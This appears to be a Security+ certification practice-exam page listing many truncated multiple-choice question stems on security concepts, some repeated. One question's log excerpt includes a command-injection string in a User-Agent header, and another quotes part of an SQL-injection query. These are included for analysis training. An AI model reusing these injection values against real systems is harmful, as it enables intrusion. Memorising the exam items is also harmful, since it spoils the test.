محاكي اختبار شهادة امن المعلومات Security+ Exam

Cloud Security Architecture Lab: Configure a secure, redundant web application architecture using the provided cloud diagram. Select appropriate components for ...

Network Security Investigation Lab: Investigate a potential network infection by analyzing host and firewall logs. Determine the source of infection and classif ...

VPN Site-to-Site Configuration Lab Scenario: A systems administrator is configuring a site-to-site VPN between two branch offices to establish secure commun ...

• Scenario : • There was a system breach due to poor password practices. • Task : • Analyze the access log and data dumps, then select the best passwor ...

A recent black-box penetration test of http://example.com discovered that external website vulnerabilities exist, such as directory traversals, cross-site scrip ...

You are a security operations analyst for a healthcare provider. Your main job function is to compare current, high-fidelity threat intelligence feeds to activi ...

You are a security operations analyst for a banking institution. Your main job function is to compare current, high-fidelity threat intelligence feeds to activi ...

Passwordless Command Question • QUESTION A security engineer is setting up passwordless authentication for the first time. • INSTRUCTIONS • Use the minimum se ...

Which of the following describes the difference between encryption and hashing?

Which of the following analysis methods allows an organization to measure the exposure factor associated with organizational assets?

Which of the following would be the most appropriate way to protect data in transit?

Which of the following best explains a concern with OS-based vulnerabilities?

Which of the following control types is AUP an example of?

Which of the following most securely protects data at rest?

Which of the following is the best way to validate the integrity and availability of a disaster recovery site?

A company with a high-availability website is looking to harden its controls at any cost. The company wants to ensure that the site is secure by finding any pos ...

A systems administrator notices that the research and development department is not using the company VPN when accessing various company-related services and sy ...

A security analyst is monitoring logs from the organization's SIEM and identifies logs related to one of their salespeople: Time | IP address | Locatio ...

Prior to implementing a design change, the change must go through multiple steps to ensure that it does not cause any security issues. Which of the following is ...

An auditor notices that, before logging into the firewall, an employee opens a document in a shared folder that contains administrative credentials. Which of th ...

An organization designs an inbound firewall with a fail-open configuration while implementing a website. Which of the following does the organization consider t ...

A security administrator is reviewing the company’s infrastructure and decides to disable all unused ports on the firewall, uninstall unnecessary software from ...

The security department is remediating vulnerabilities that were found during an audit of newly deployed systems. Which of the following must be done to ensure ...

Which of the following should be used to ensure a device is inaccessible to a network-connected resource?

A retail company receives a request to remove a customer’s data. Which of the following is the retail company considered under GDPR legislation?

A company has yearly engagements with a service provider. The general terms and conditions are the same for all engagements. The company wants to simplify the p ...

The security team must identify a strategy to automatically deprovision employees who leave the company. Which of the following actions will accomplish this tas ...

Which of the following is an example of memory injection?

A company processes and stores sensitive data on its own systems. Which of the following steps should the company take first to ensure compliance with privacy r ...

Which of the following options will provide the lowest RTO and RPO for a database?

Which of the following security controls are a company implementing by deploying HIPS (Select two).

When trying to access an internal website, an employee reports that a prompt displays, stating that the site is insecure. Which of the following certificate typ ...

A program manager wants to ensure contract employees can only access the company’s computers Monday through Friday from 9 a.m. to 5 p.m. Which of the following ...

Which of the following is prevented by proper data sanitization?

A forensic engineer determines that the root cause of a compromise is a SQL injection attack. Which of the following should the engineer review to identify the ...

A software developer wishes to implement an application security technique that will provide assurance of the application's integrity. Which of the following te ...

After a series of account compromises and credential misuse, a company hires a security manager to develop a security program. Which of the following steps shou ...

Which of the following attacks primarily targets insecure networks?

Which of the following describes effective change management procedures?

Which of the following are the best methods for hardening end user devices? (Select two).

A contractor is required to visually inspect the motherboards of all new servers that are purchased to determine whether the servers were tampered with. Which o ...

The Chief Executive Officer has requested that a vendor conduct a penetration test without engaging the internal IT team to validate the company's investment in ...

An organization found gaps in its software development environment and is implementing compensating controls to better protect its systems from external threats ...

Which of the following is a qualitative approach to risk analysis?

A CIRT team updates their playbooks to include instructions to respond to a ransomware attack. To prepare for a real event, the team performs a simulation and a ...

A company is considering an expansion of access controls for an application that contractors and internal employees use to reduce costs. Which of the following ...

An administrator implements web-filtering products but still sees that users are visiting malicious links. Which of the following configuration items does the s ...

A company discovers suspicious transactions that were entered into the company's database and attached to a user account that was created as a trap for maliciou ...

A company that has a large IT operation is looking to better control, standardize, and lower the time required to build new servers. Which of the following arch ...

A recent review of logs indicate many attempts to join an internal wireless network from external devices. The connections appear to be originating from surroun ...

Users see a certificate warning on their browsers when connecting to the server over HTTPS. Which of the following is the most likely cause?

Which of the following would best allow a company to prevent access to systems from the internet?

While browsing a web page, a user receives a pop-up with a link telling them to navigate to another site. To which of the following is the site vulnerable?

Which of the following objectives is best achieved by a tabletop exercise?

A software engineering manager wants to scan the code for security vulnerabilities before it is pushed into production. Which of the following types of analysis ...

Which of the following encryption methods protects data if a user loses their laptop?

A security architect wants to prevent employees from receiving malicious attachments by email. Which of the following functions should the chosen solution do?

Which of the following principles requires that a company must keep files or records for a prescribed period of time before it disposes of those files or record ...

For which of the following reasons would a systems administrator leverage a 3DES hash from an installer file that is posted on a vendor’s website?

A security analyst wants to automate a task that shares data between programs. Which of the following is the best option for the analyst to use?

Which of the following is an example of a data protection strategy that uses tokenization?

Which of the following solutions provides a single, centralized source for reviewing events?

A security administrator is addressing an issue with a legacy system that communicates data using an unencrypted protocol to transfer sensitive data to a third ...

Which of the following is the best reason to complete an audit in a banking environment?

Which of the following is the best way to prevent data from being leaked from a secure network that does not need to communicate externally?

A user needs to complete training at https://comptiatraining.com. After manually entering the URL, the user sees that the accessed website is noticeably differe ...

A Chief Information Security Officer is developing procedures to guide detective and corrective activities associated with common threats, including phishing, s ...

Which of the following is the best reason to perform a tabletop exercise?

A security team is in the process of hardening the network against externally crafted malicious packets. Which of the following is the most secure method to pro ...

A company is experiencing a high number of users who are clicking on email-based attacks even though those users have completed annual training. The company's C ...

Which of the following should a systems administrator do after performing remediation activities?

A vendor salesperson is a personal friend of a company's Chief Financial Officer (CFO). The company recently made a large purchase from the vendor, which was di ...

A company's accounting department receives an urgent payment message from the company's bank domain with instructions to wire transfer funds. The sender request ...

During a penetration test in a hypervisor, the security engineer is able to use a script to inject a malicious payload and access the host filesystem. Which of ...

Which of the following elements of digital forensics should a company use if it needs to ensure the integrity of evidence?

A security analyst notices unusual behavior on the network. The IDS on the network was not able to detect the activities. Which of the following should the secu ...

Which of the following is most likely a security concern when installing and using low-cost IoT devices in infrastructure environments?

A company recently set up a system for employees to access their files remotely. However, the IT team has noticed that some employees are using personal devices ...

A security analyst identifies an employee who added an unauthorized wireless router to an office branch. After an investigation, the router is removed, and the ...

After a breach at a data processing center, an administrator receives a notification that administrative passwords were leaked online. Which of the following sh ...

A security analyst wants to automate a task that shares data between programs. Which of the following is the best option for the analyst to use?

A company wants to connect several hundred branch locations in a mesh model. All the users in each branch should be able to reach the data center as well as the ...

A security analyst discovers multiple vulnerabilities and must mitigate them. The analyst must ensure protection against the following attacks: SQL injection ...

Which of the following should be deployed on an externally facing web server in order to establish an encrypted connection?

Which of the following mitigation techniques would a security analyst most likely use to avoid bloatware on devices?

Which of the following is the best way to remove personal data from a social media account that is no longer being used?

An administrator needs to ensure all emails sent and received by a specific address are stored in a non-alterable format. Which of the following best describes ...

Which of the following activities identifies but does not exploit vulnerabilities?

Which of the following should a systems administrator do after performing remediation activities?

Which of the following is a possible consequence of a VM escape?

A network engineer is increasing the overall security of network devices and needs to harden the devices. Which of the following will best accomplish this task?

Which of the following is the most relevant reason a DPO would develop a data inventory?

An organization is required to provide assurance that its controls are properly designed and operating effectively. Which of the following reports will best ach ...

Which of the following would a service provider supply as an assurance for a disposal service as part of a disposal process?

While updating the security awareness training, a security analyst wants to address issues created if vendors' email accounts are compromised. Which of the foll ...

An attacker defaces a company’s website and refuses to relinquish control until the company removes specific harmful chemicals from its products. Which of the f ...

While a school district is performing state testing, a security analyst notices all internet services are unavailable. The analyst discovers that ARP poisoning ...

Which of the following threat vectors is most commonly utilized by insider threat actors attempting data exfiltration?

A company discovers suspicious transactions that were entered into the company's database and attached to a user account that was created as a trap for maliciou ...

Which of the following activities is used to determine the reason an incident occurred, prior to closing the incident?

Which of the following is the act of proving to a customer that software developers are trained on secure coding?

An organization keeps servers with confidential information in the same network as workstations. An attacker compromises a workstation and moves laterally to a ...

A site reliability engineer is designing a recovery strategy that requires quick fail over to an identical site if the primary facility goes down. Which of the ...

Which of the following definitions best describes the concept of log correlation?

Which of the following steps should be taken before mitigating a vulnerability in a production server?

A company purchased cyber insurance to address items listed on the risk register. Which of the following strategies does this represent?

The Chief Information Officer (CIO) asked a vendor to provide documentation detailing the specific objectives within the compliance framework that the vendor’s ...

Which of the following types of identification methods can be performed on a deployed application during runtime?

A company recently set up a system for employees to access their files remotely. However, the IT team has noticed that some employees are using personal devices ...

A security analyst notices unusual behavior on the network. The IDS on the network was not able to detect the activities. Which of the following should the secu ...

A security architect wants to prevent employees from receiving malicious attachments by email. Which of the following functions should the chosen solution do?

A security administrator is implementing encryption on all hard drives in an organization. Which of the following security concepts is the administrator applyin ...

An organization is preparing to export proprietary software to a customer. Which of the following is the best way to prevent the loss of intellectual property?

Which of the following techniques would attract the attention of a malicious attacker in an insider threat scenario?

Which of the following is the greatest advantage that network segmentation provides?

An accounting employee recently used software that was not approved by the company. Which of the following risks does this most likely represent?

A security analyst learns that an attack vector, which was used as a part of a recent incident, was a well-known IoT device exploit. The analyst needs to review ...

A new corporate policy requires all staff to use multifactor authentication to access company resources. Which of the following can be utilized to set up this f ...

Which of the following tasks is typically included in the BIA process?

An organization wants to increase an application's resiliency by configuring access to multiple servers in the organization's geographically dispersed environme ...

Which of the following is an example of a data protection strategy that uses tokenization?

To which of the following security categories does an EDR solution belong?

Which of the following should be used to ensure an attacker is unable to read the contents of a mobile device’s drive if the device is lost?

Company A jointly develops a product with Company B, which is located in a different country. Company A finds out that their intellectual property is being shar ...

Which of the following provides resilience by hosting critical VMs within different IaaS providers while being maintained by internal application owners?

Which of the following attacks exploits a potential vulnerability as a result of direct access to a system using weak cryptographic algorithms?

Which of the following is a use of CVSS?

Which of the following describes the difference between encryption and hashing?

A company is concerned about theft of client data from decommissioned laptops. Which of the following is the most cost-effective method to decrease this risk?

A company recently purchased a new building that does not have an existing wireless or wired infrastructure. A network engineer at the company needs to determin ...

A retail store has recently been targeted by bad actors operating from a different continent. Which of the following would best limit unauthorized access to cre ...

Which of the following is a qualitative approach to risk analysis?

A security analyst notices an increase in port scans on the edge of the corporate network. Which of the following logs should the analyst check to obtain the at ...

A penetration test reveals that users can easily access internal VLANs from the company's guest Wi-Fi. Which of the following security principles would remediat ...

While a user reviews their email, a host gets infected by malware that came from an external hard drive plugged into the host. The malware steals all the user's ...

A penetration tester was able to gain unauthorized access to a hypervisor platform. Which of the following vulnerabilities was most likely exploited?

A Chief Information Security Officer wants to enhance security capabilities to block PII from being emailed or downloaded to unapproved external media. Which of ...

Which of the following should a systems administrator use to decrease the company’s hardware attack surface?

Which of the following is a directive managerial control?

A security analyst is reviewing the following logs about a suspicious activity alert for a user's VPN log-ins: Which of the following malicious activity in ...

A company’s leadership team wants to ensure employees only print business-related documents on company printers. Which of the following documents should the com ...

A network administrator wants to ensure that network traffic is highly secure while in transit. Which of the following actions best describes the actions the ne ...

Which of the following is the best way to prevent data from being leaked from a secure network that does not need to communicate externally?

A company uses a cloud-based server for file storage and wants to ensure the security of its data in transit. Which of the following should the company use to s ...

A new employee accessed an unauthorized website. An investigation found that the employee violated the company’s rules. Which of the following did the employee ...

An engineer has ensured that the switches are using the latest OS, the servers have the latest patches, and the endpoints' definitions are up to date. Which of ...

Which of the following provides the best protection against unwanted or insecure communications to and from a device?

A security analyst is monitoring logs from the organization's SIEM and identifies logs related to one of their salespeople: Time | IP address | Locatio ...

A penetration test identifies that an SMBv1 is enabled on multiple servers across an organization. The organization wants to remediate this vulnerability in the ...

Which of the following should a company use to provide proof of external network security testing?

A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the Sa ...

An administrator wants to automate an account permissions update for a large number of accounts. Which of the following would best accomplish this task?

Which of the following is a type of vulnerability that involves inserting scripts into web-based applications in order to take control of the client’s web brows ...

An organization wants to deploy software in a container environment to increase security. Which of the following would limit the organization’s ability to achie ...

Which of the following aspects of the data management life cycle is most directly impacted by local and international regulations?

Which of the following should be used to ensure an attacker is unable to read the contents of a mobile device's drive if the device is lost?

A company recently purchased a new building that does not have an existing wireless or wired infrastructure. A network engineer at the company needs to determin ...

Users report that certain processes from a batch job are not working correctly and various resources are unavailable. An application owner provides the source a ...

An administrator must authenticate users to systems using credentials already authenticated by a business partner's LDAP system. Which of the following should t ...

Which of the following would be the greatest concern for a company that is aware of the consequences of non-compliance with government regulations?

Which of the following is the most likely reason a security analyst would review SIEM logs?

A Chief Information Security Officer wants to enhance security capabilities to block PII from being emailed or downloaded to unapproved external media. Which of ...

Company A jointly develops a product with Company B, which is located in a different country. Company A finds out that their intellectual property is being shar ...

A company plans to secure its systems by: • Preventing users from sending sensitive data over corporate email • Restricting access to potentially harmful we ...

Which of the following hardening techniques must be applied on a container image before deploying it to a production environment?

A user sends an email that includes a digital signature for validation. Which of the following security concepts would ensure a user cannot deny they sent the e ...

The board of a company needs to tell the leadership team which activities are too risky to undertake during business operations. Which of the following risk man ...

Which of the following attacks uses a website to collectively target a group of developers within an organization?

During a recent log review, an analyst discovers evidence of successful injection attacks. Which of the following will best address this issue?

Which of the following is a preventive physical security control?

An employee receives a work phone. Instead of starting up with the normal operating system, the phone loads to a gaming platform using administrative credential ...

An organization's web servers host an online ordering system. The organization discovers that the servers are vulnerable to a malicious JavaScript injection, wh ...

The security team is concerned about the amount of third-party SaaS applications requiring unique credentials that are not tied to a user's primary domain accou ...

A penetration tester visits a client's website and downloads the site's content. Which of the following actions is the penetration tester performing?

Which of the following actions must an organization take to comply with a person's request for the right to be forgotten?

An administrator needs to perform server hardening before deployment. Which of the following steps should the administrator take?

While conducting a business continuity tabletop exercise, the security team becomes concerned by potential impacts if a generator were to develop a fault duri ...

Which of the following activities is used to determine the reason an incident occurred, prior to closing the incident?

A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the Sa ...

While reviewing a recent compromise, a forensics team discovers there are hard-coded credentials in the database connection strings. Which of the following asse ...

A security analyst is reviewing the security of a SaaS application that the company intends to purchase. Which of the following documentations should the securi ...

An engineer needs to ensure that a script has not been modified before it is launched. Which of the following best provides this functionality?

An MSSP manages firewalls for hundreds of clients. Which of the following tools would be most helpful to create a standard configuration template in order to im ...

An organization wants to increase an application's resiliency by configuring access to multiple servers in the organization's geographically dispersed environme ...

While a user reviews their email, a host gets infected by malware that came from an external hard drive plugged into the host. The malware steals all the user's ...

A company purchased cyber insurance to address items listed on the risk register. Which of the following strategies does this represent?

A company is required to use certified hardware when building networks. Which of the following best addresses the risks associated with procuring counterfeit ha ...

Which of the following security concepts is accomplished with the installation of a RADIUS server?

To which of the following security categories does an EDR solution belong?

An analyst receives alerts for a CPU utilization spike on the servers that host a public website. The analyst determines that the servers are running outdated s ...

Which of the following should a systems administrator use to decrease the company's hardware attack surface?

An unexpected and out-of-character email message from a Chief Executive Officer's corporate account asked an employee to provide financial information and to ch ...

Which of the following is the greatest advantage that network segmentation provides?

Which of the following is the best physical security measure that prevents unauthorized vehicles from entering a data center while still allowing foot traffic?

Which of the following threat vectors would a user be vulnerable to when using a smartphone to scan a two-dimensional matrix barcode?

While a school district is performing state testing, a security analyst notices all internet services are unavailable. The analyst discovers that ARP poisoning ...

A user receives an aggressive text from an unknown sender who is demanding money. Which of the following attacks is this an example of?

Which of the following would best explain why a security analyst is running daily vulnerability scans on all corporate endpoints?

The internal security team is investigating a suspicious attachment and wants to perform a behavior analysis in an isolated environment. Which of the following ...

Which of the following can be used to mitigate attacks from high-risk regions?

An administrator needs to ensure all emails sent and received by a specific address are stored in a non-alterable format. Which of the following best describes ...

Which of the following would an organization most likely use to minimize the loss of data on a file server in the event data needs to be restored due to loss of ...

Which of the following architecture models ensures that critical systems are physically isolated on the network to prevent access from users with remote access ...

A company identified the potential for malicious insiders to harm the organization. Which of the following measures should the organization implement to reduce ...

Which of the following is a directive managerial control?

A penetration tester was able to gain unauthorized access to a hypervisor platform. Which of the following vulnerabilities was most likely exploited?

A security analyst receives an alert from a front-end web server connected to a database back end. The alert contains the following logs: SELECT * FROM users ...

Which of the following activities identifies but does not exploit vulnerabilities?

Which of the following types of identification methods can be performed on a deployed application during runtime?

A security analyst is investigating a suspicious file and wants to determine if it has been modified. Which of the following methods would be best for this purp ...

A security engineer needs to quickly identify a signature from a known malicious file. Which of the following analysis methods would the security engineer most ...

An organization that handles sensitive information wants to protect the information by using a reversible technology. Which of the following best satisfies this ...

A group of developers has a shared backup account to access the source code repository. Which of the following is best way to secure the backup account if there ...

Which of the following aspects of the data management life cycle is most directly impacted by local and international regulations?

Several employees download a productivity program that is useful but also leaks contact information and corporate organizational structure details. Which of the ...

Which of the following does a user often agree to when logging in to a domain?

Which of the following provides resilience by hosting critical VMs within different IaaS providers while being maintained by internal application owners?

An organization purchased a critical business application containing sensitive data. The organization would like to ensure that the application is not exploited ...

Which of the following steps should be taken before mitigating a vulnerability in a production server?

A security engineer needs to patch an OS vulnerability that impacts all corporate laptops. Which of the following is necessary to ensure all corporate laptops a ...

An organization wants to deploy software in a container environment to increase security. Which of the following would limit the organization's ability to achie ...

A new corporate policy requires all staff to use multifactor authentication to access company resources. Which of the following can be utilized to set up this f ...

Which of the following sites offers immediate service restoration following a disaster?

Which of the following provides the best protection against unwanted or insecure communications to and from a device?

A manager meets with various stakeholders involved with a recently resolved security incident. During the meeting, they discuss potential improvements to the en ...

A risk committee determines that the SLE of a hardware failure is $10,000. The ARO is five. Which of the following describes the ALE?

Which of the following architecture models ensures that critical systems are physically isolated on the network to prevent access from users with remote access ...

Which of the following describes a situation where a user is authorized before being authenticated?

A security analyst receives an alert from a front-end web server connected to a database back end. The alert contains the following logs: SELECT * FROM users ...

A user sits in a coffee shop on a government-issued laptop. A stranger starts a conversation with the user and starts asking about where the user works, what di ...

Which of the following should a security analyst use to prioritize the remediation of a vulnerability?

A security analyst must prevent remote users from accessing malicious URLs. The sites need to be checked inline for reputation, content, or categorization. Whic ...

A systems administrator needs to provide traveling employees with a security measure that will protect company devices regardless of where they are working. Whi ...

A company wants to ensure that a mission-critical database should only be accessed from specific internal IP addresses. Which of the following should the compan ...

A security engineer has been assigned to work on a request from outside counsel. The security engineer must provide all email correspondence within a specific d ...

A security analyst regularly receives emails from users who are concerned that attached files may be malicious. Which of the following should the analyst use to ...

An employee from the accounting department logs in to the website used for processing the company’s payments. After logging in, a new desktop application automa ...

A Chief Security Officer signs off on a request to allow inbound SMB and RDP from the internet to a single VLAN. Which of the following is the most likely expla ...

A network security administrator must allow internet access for a specific application virtualization software. Which of the following should the administrator ...

A company hired a security manager from outside the organization to lead security operations. Which of the following actions should the security manager perform ...

Which of the following is an advantage of a microservice-based architecture over traditional software architectures?

Which of the following is an example of a certificate that is generated by an internal source?

A company experiences a breach. The investigation reveals that the threat actor used a zero-day vulnerability to gain access and move laterally. Which of the fo ...

Which of the following data protection strategies can be used to confirm file integrity?

Which of the following digital forensics activities would a security team perform when responding to legal requests in a pending investigation?

A security analyst needs to improve the company’s authentication policy following a password audit. Which of the following should be included in the policy?

Which of the following is used to calculate the impact to an organization per cybersecurity incident?

A company wants to track modifications to the code that is used to build new virtual servers. Which of the following will the company deploy

A forensic engineer determines that the root cause of a compromise is a SQL injection attack. Which of the following should the engineer review to identify the ...

Which of the following agreements defines response time, escalation points, and performance metrics?

A university uses two different cloud solutions for storing student data. Which of the following does this scenario represent?

A security administrator is reviewing the company’s infrastructure and decides to disable all unused ports on the firewall, uninstall unnecessary software from ...

A retail company receives a request to remove a customer’s data. Which of the following is the retail company considered under GDPR legislation?

A penetration test identifies that an SMBv1 is enabled on multiple servers across an organization. The organization wants to remediate this vulnerability in the ...

While updating the security awareness training, a security analyst wants to address issues created if vendors' email accounts are compromised. Which of the foll ...

Which of the following phases of the incident response process attempts to minimize disruption?

Which of the following is a vulnerability concern for end-of-life hardware?

An accounting employee recently used software that was not approved by the company. Which of the following risks does this most likely represent?

An organization is required to provide assurance that its controls are properly designed and operating effectively. Which of the following reports will best ach ...

Which of the following can be deployed in data centers as a protection against an undervoltage event?

A business is expanding to a new country and must protect customers from accidental disclosure of specific national identity information. Which of the following ...

A company is using a legacy FTP server to transfer financial data to a third party. The legacy system does not support SFTP, so a compensating control is needed ...

A customer has a contract with a CSP and wants to identify which controls should be implemented in the IaaS enclave. Which of the following is most likely to co ...

Which of the following should an organization use to ensure that it can review the controls and performance of a service provider or vendor?

Which of the following should be used to aggregate log data in order to create alerts and detect anomalous activity?

Which of the following solutions would most likely be used in the financial industry to mask sensitive data?

An organization decides that most employees will work remotely. The existing VPN solution does not have adequate bandwidth, and the content filtering proxy is o ...

Which of the following would help reduce alert fatigue?

Which of the following would best ensure a controlled version release of a new software application?

Which of the following makes IaC a preferred security architecture over traditional infrastructure models?

Which of the following did the vendor provide to the CIO?

Which of the following provides availability and mitigates the risk of a single point of failure in an application?

Following a security incident involving a fully patched system, an IT administrator would like to mature the incident response process by ingesting more sources ...

Which of the following is a reason to perform a one-time risk assessment?

An analyst discovers a suspicious item in the SQL server logs. Which of the following could be evidence of an attempted SQL injection?

The IT department is updating its policies regarding BYOD in the workplace after they discovered peer-to-peer torrent software. Which of the following would be ...

Which of the following should be used to select a label for a file based on the file's value, sensitivity, or applicable regulations?

Which of the following would help reduce the impact of a vulnerability in NAS installed on a large office network?

In which of the following will unencrypted PLC management traffic most likely be found?

Various company stakeholders meet to discuss roles and responsibilities in the event of a security breach that would affect offshore offices. Which of the follo ...

A penetration test has demonstrated that domain administrator accounts were vulnerable to pass-the-hash attacks. Which of the following would have been the best ...

Which of the following is a benefit of vendor diversity?

After a security incident, a systems administrator asks the company to buy a NAC platform. Which of the following attack surfaces is the systems administrator t ...

Which of the following documents details how to accomplish a technical security task?

A security analyst is reviewing logs and discovers the following: 149.34.228.10 - - [28/Jan/2023:16:32:45 -0300] "GET / HTTP/1.0" User-Agent: ${/bin/sh/ id} 20 ...

Employees sign an agreement that restricts specific activities when leaving the company. Violating the agreement can result in legal consequences. Which of the ...

Which of the following could potentially be introduced at the time of side loading?

A company's accounts payable clerk receives a message from a vendor asking to change their bank account before paying an invoice. The clerk makes the change and ...

A systems administrator just purchased multiple network devices. Which of the following should the systems administrator perform to prevent attackers from acces ...

Which of the following would best prepare a security team for a specific incident response scenario?

Which of the following best describe the benefits of a microservices architecture when compared to a monolithic architecture?

The physical security team at a company receives reports that employees are not displaying their badges. The team also observes employees tailgating at controll ...

After creating a contract for IT contractors, the human resources department changed several clauses. The contract has gone through three revisions. Which of th ...

Which of the following is the most likely to be used to document risks, responsible parties, and thresholds?

According to various privacy rules and regulations, users have the power to request that all data pertaining to them is deleted. This is known as:

Which of the following is a social engineering attack in which a bad actor impersonates a web URL?

A business provides long-term cold storage services to banks that are required to follow regulator-imposed data retention guidelines. Banks that use these servi ...

Which of the following is the best mitigation for a zero-day vulnerability found in mission-critical production servers that must be highly available?

A database engineer needs sample customer data for testing purposes. Which of the following techniques can be used to remove sensitive information from database ...

Which of the following activities should be performed first to compile a list of vulnerabilities in an environment?

Which of the following can best contribute to prioritizing patch applications?

The number of tickets the help desk has been receiving has increased recently due to numerous false-positive phishing reports. Which of the following would be b ...

An analyst identifies that multiple users have the same passwords, but the hashes appear to be completely different. Which of the following most likely explains ...

A security analyst created a fake account and saved the password in a non-readily accessible directory in a spreadsheet. An alert was also configured to noti ...

Which of the following security concepts is accomplished when granting access after an individual has logged in to a computer network?

A systems administrator creates a script that validates OS version, patch levels, and installed applications when users log in. Which of the following examples ...

Which of the following is a type of vulnerability that may result from outdated algorithms or keys?

A security administrator protects passwords by using hashing. Which of the following best describes what the administrator is doing?

Which of the following methods to secure data is most often used to protect data in transit?

A security team receives reports about high latency and complete network unavailability throughout most of the office building. Flow logs from the campus switch ...

An administrator must replace an expired SSL certificate. Which of the following does the administrator need to create the new SSL certificate?

Which of the following types of vulnerabilities involves attacking a system to access adjacent hosts?

A company is concerned with supply chain compromise of new servers and wants to limit this risk. Which of the following should the company review first?

Which of the following is the best safeguard to protect against an extended power failure?

An organization needs to monitor its users' activities in order to prevent insider threats. Which of the following solutions would help the organization achieve ...

Which of the following actions would reduce the number of false positives for an analyst to manually review?

A security team installs an IPS on an organization’s network and needs to configure the system to detect and prevent specific network attacks. Which of the foll ...

Which of the following data types relates to data sovereignty?

An administrator has configured a quarantine subnet for all guest devices that connect to the network. Which of the following would be best for the security tea ...

Which of the following describes the reason for using an MDM solution to prevent jailbreaking?

A security analyst is prioritizing vulnerability scan results using a risk-based approach. Which of the following is the most efficient resource for the analyst ...

A systems administrator wants to use a technical solution to explicitly define file permissions for the entire team. Which of the following should the administr ...

A Chief Information Security Officer (CISO) has developed information security policies that relate to the software development methodology. Which of the follow ...

Which of the following is a benefit of an RTO when conducting a business impact analysis?

Which of the following threat actors would most likely deface the website of a high-profile music group?

Which of the following should a company use to provide proof of external network security testing?

Which of the following is the most important element when defining effective security governance?

Which of the following is used to monitor suspicious traffic in real time between multiple systems within an organization?

Which of the following prevents unauthorized modifications to internal processes, assets, and security controls?

A company that operates with most of its infrastructure in the cloud had its development environment breached. The attackers gained access via a public-facing d ...

Several users report receiving emails with a link that prompts them to enter and change their password. Some users have already entered their information. Which ...

Which of the following is a benefit of launching a bug bounty program? (Select two).

A company is experiencing loss of availability due to excessive traffic to their front-end web servers. The company hires a digital forensics expert to investig ...

An administrator downloads a patch from outside of the official vendor's site and applies the patch to a recent critical operating system CVE. After deploying t ...

An organization failed to account for the right-to-be-forgotten regulations. Which of the following impacts might this action have on the company?

Which of the following data types best describes an AI tool developed by a company to automate the ticketing system under a specific contract?

During an assessment, an organization provides a penetration tester with a website URL and login credentials. However, the tester does not have access to the so ...

During a recent penetration test, the tester was able to plug a machine into an open wall jack, receive an IP address, and access internal resources and the int ...

A Chief Information Security Officer (CISO) of an enterprise environment wants to ensure that users cannot navigate to known malicious domains. The CISO also wa ...

After multiple phishing simulations, the Chief Security Officer announces a new program that incentivizes employees to not click phishing links in the upcoming ...

Which of the following is the most likely benefit of conducting an internal audit?

Which of the following can automate vulnerability management?

An engineer needs to ensure that a script has not been modified before it is launched. Which of the following best provides this functionality?

Which of the following control types describes an alert from a SIEM tool?

A company executive connects to various networks, such as hotel guest Wi-Fi, while traveling. A security analyst needs to provide a solution that will allow the ...

A company relies on open-source software libraries to build the software used by its customers. Which of the following vulnerability types would be the most dif ...

Which of the following is the first step to secure a newly deployed server?

Which of the following activities are associated with vulnerability management?

A security manager wants to reduce the number of steps required to identify and contain basic threats. Which of the following will help achieve this goal?

Which of the following best describes when a user installs an application from an unofficial application store?

An organization is evaluating new regulatory requirements associated with the implementation of corrective controls on a group of interconnected financial syste ...

A security report shows that during a two-week test period, 80% of employees unwittingly disclosed their SSO credentials when accessing an external website. The ...

Which of the following would a service provider supply as an assurance for a disposal service as part of a disposal process?

A remote employee navigates to a shopping website on their company-owned computer. The employee clicks a link that contains a malicious file. Which of the follo ...

An organization has published a list of domains that end users are not authorized to visit on company devices in order to mitigate data loss or installation of ...

Which of the following should an organization focus on the most when making decisions about vulnerability prioritization?

A legal department must maintain a backup from all devices that have been shredded and recycled by a third party. Which of the following best describes this req ...

Which of the following can be best used to discover a company’s publicly available breach information?

An organization discovers that its cold site does not have enough storage and computers available. Which of the following was most likely the cause of this fail ...

A company wants to add an MFA solution for all employees who access the corporate network remotely. Login requirements include something you know, are, and have ...

Which of the following is used to improve security and overall functionality without losing critical application data?

Which of the following is a prerequisite for a DLP solution?

An accounting clerk sent money to an attacker’s bank account after receiving fraudulent instructions over the phone to use a new account. Which of the following ...

Which of the following allows a systems administrator to tune permissions for a file?

Which of the following best protects sensitive data in transit across a geographically dispersed infrastructure?

Which of the following is the primary purpose of a service that tracks log-ins and time spent using the service?

Which of the following is a risk for a company using end-of-life applications on its network?

A database administrator must replicate the production environment for a new development project. The data owner wants to ensure that the production data will b ...

Which of the following best describes the concept of information being stored outside of its country of origin while still being subject to the laws and require ...

Which of the following security principles most likely requires validation before allowing traffic between systems?

An alert references attacks associated with a zero-day exploit. An analyst places a bastion host in the network to reduce the risk of the exploit. Which of the ...

A company evaluates several options that would allow employees to have remote access to the network. The security team wants to ensure the solution includes AAA ...

A security analyst has determined that a security breach would have a financial impact of $15,000 and is expected to occur twice within a three-year period. Whi ...

Which of the following phases of the incident response process attempts to minimize disruption?

A government worker secretly copies classified files that contain defense tactics information to an external drive. The government worker then gives the externa ...

Which of the following is most likely to be used as a just-in-time reference document within a security operations center?

A company’s security team is reviewing its business continuity plan and must determine the amount of time needed for operations to resume after a disaster. Whic ...

During a SQL update of a database, a temporary field used as part of the update sequence was modified by an attacker before the update completed in order to all ...

The help desk receives multiple calls indicating that machines are running slowly when running enterprise applications. The help desk notes that the affected ma ...

A company makes a change during the appropriate change window, but the unsuccessful change extends beyond the scheduled time and impacts customers. Which of the ...

After an alert was triggered, a security analyst observed the following log: Event ID: 4728 A member was added to the security-enabled global group. Subject: ...

The management team reports that employees are missing features on company-provided tablets, which is causing productivity issues. The management team directs t ...

An organization is evaluating new regulatory requirements associated with the implementation of corrective controls on a group of interconnected financial syste ...

Which of the following activities are associated with vulnerability management?

Multiple users in an organization sign up to use an enterprise collaboration application to increase productivity. The application is easier to use than the one ...

An organization decides that most employees will work remotely. The existing VPN solution does not have adequate bandwidth, and the content filtering proxy is o ...

Which of the following is the most closely associated with confidentiality?

A company is experiencing issues with employees leaving the company for a competitor and taking customer contact information with them. Which of the following t ...

A security administrator receives multiple reports about the same suspicious email. Which of the following is the most likely reason for the malicious email's c ...

Which of the following data recovery strategies will result in a quick recovery at low cost?

Which of the following technologies can achieve microsegmentation?

A security analyst is working with the IT group to define appropriate procedures for the destruction of media and assets in the enterprise environment. Which of ...

An organization is evaluating new regulatory requirements associated with the implementation of corrective controls on a group of interconnected financial syste ...

Which of the following security controls would best guard a payroll system against insider manipulation threats?

